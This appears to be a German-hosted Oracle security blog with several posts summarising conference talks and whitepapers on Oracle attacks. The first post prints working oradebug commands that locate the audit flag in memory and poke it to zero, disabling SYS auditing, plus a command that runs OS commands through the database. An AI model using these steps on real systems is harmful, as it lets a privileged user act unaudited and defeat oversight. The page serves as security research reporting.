17 Sep 2011 von Alexander Kornbrust.

Currently I am staying at the Hacktivity 2011 conference in Budapest. I talked about Oracle Forensics (pdf of the presentation).The second talk was given by Laszlo Toth.  He showed at lot of interesting things, e.g. how to disable Oracle Audit and SYS Auditing using oradebug. His presentation will be available soon on his sooner or later webpage soonerorlater.hu.

oradebug is an undocumented (from Oracle) feature in all versions of Oracle which allows powerful activities if you have SYSDBA privileges (and getting SYSDBA privileges is easy as DBA). The peek/poke statement allows to read/modify the memory of the database:

Sample - disable Oracle SYS Auditing:

sqlplus / as sysdba

SQL> — get the offset for oradebug

SQL> select fsv.KSMFSNAM,sga.*
from x$ksmfsv fsv, x$ksmmem sga
where sga.addr=fsv.KSMFSADR
and fsv.ksmfsnam like ‘kzaflg_%’;

KSMFSNAM ADDR INDX INST_ID KSMMMVAL
—————- ———- ———- —————-
kzaflg_ 0000000060031BB0 26652 1 0000000000000001

SQL> show parameter audit;

NAME TYPE VALUE
———————————— ———– ——————————
audit_file_dest string /u01/app/oracle/admin/PSALES/adump
audit_sys_operations boolean TRUE
audit_syslog_level string
audit_trail string DB, EXTENDED

SQL> oradebug poke 0×60031bb0 1 0
BEFORE: [060031BB0, 060031BB4) = 00000001
AFTER: [060031BB0, 060031BB4) = 00000000

oradebug can also be used to disable standard auditing. oradebug makes Oracle products like Oracle Auditvault nearly useless because Oracle Auditvault relies on Oracle native auditing. A (SYS)DBA can switch off auditing for a few seconds, do activities without being audited and switch auditing on again. .

Another trick from Laszlo’s presentation was how to use oradebug to call OS commands via the database

SQL> oradebug call system “ls -la >/tmp/hacktivity.txt”

Later I will talk about Laszlo’s trick how to disable the Oracle authentication using oradebug.

Geschrieben in Exploit, Forensics, Oracle Security | Drucken | Keine Kommentare »

13 Apr 2011 von Alexander Kornbrust.

Geschrieben in Trainings, Exploit, Forensics, Oracle Security | Drucken | Keine Kommentare »

18 Apr 2010 von Alexander Kornbrust.

 The Blackhat Europe 2010 “Oracle, Interrupted: Stealing Sessions and Credentials” (presentation, whitepaper) of Steve Ocepek and Wendel G. Henrique are online. An interview with Steve about the talk can be found here.

As mentioned in a previous blog post this talk  shows how to intercept unencrypted (=default) TNS connections and inject statements into a running session. Steve and Wendel will soon release 2 tools Vamp and thicknet.

I will try to present these tools at the DOAG Expertenseminar in Berlin.

A good summary of the talk can be found at Peter Van Eeckhoutten’s blog.

Geschrieben in Tools, Exploit, Oracle Security | Drucken | Keine Kommentare »

22 Feb 2010 von Alexander Kornbrust.

Sumit Siddarth (Sid) has just published a really good whitepaper about “Hacking Oracle from the Web“.This is the most comprehensive published collection of different techniques for attacking Oracle from the web. Sid spent a lot of time composing the different techniques mentioned in various presentations and whitepapers.

Sid describes various techniques like data extraction (inband techniques like union or error messages, out-of-band techniques like heavy queries, blind, …), privilege escalation (sys.kupp$proc, dbms_repcat_rpc and dbms_export_extension)  and OS code execution.

Well done Sid.

Geschrieben in Exploit, SQL Injection, Security | Drucken | Keine Kommentare »

5 Feb 2010 von Alexander Kornbrust.

Blackhat removed the video from David Litchfield (containing the 0day exploit code for 11g) from their website. But it’s too late because the 0day code for 11g can be found in the meantime in many places.

The video was downloaded several times and it’s just a question of time until it re-appears…

BTW Oracle 10.2.0.4 with all security patches is vulnerable against this issue too. But the exploit must be modified a little bit.

Geschrieben in 11g, Exploit, David Litchfield, Allgemein | Drucken | 5 Kommentare »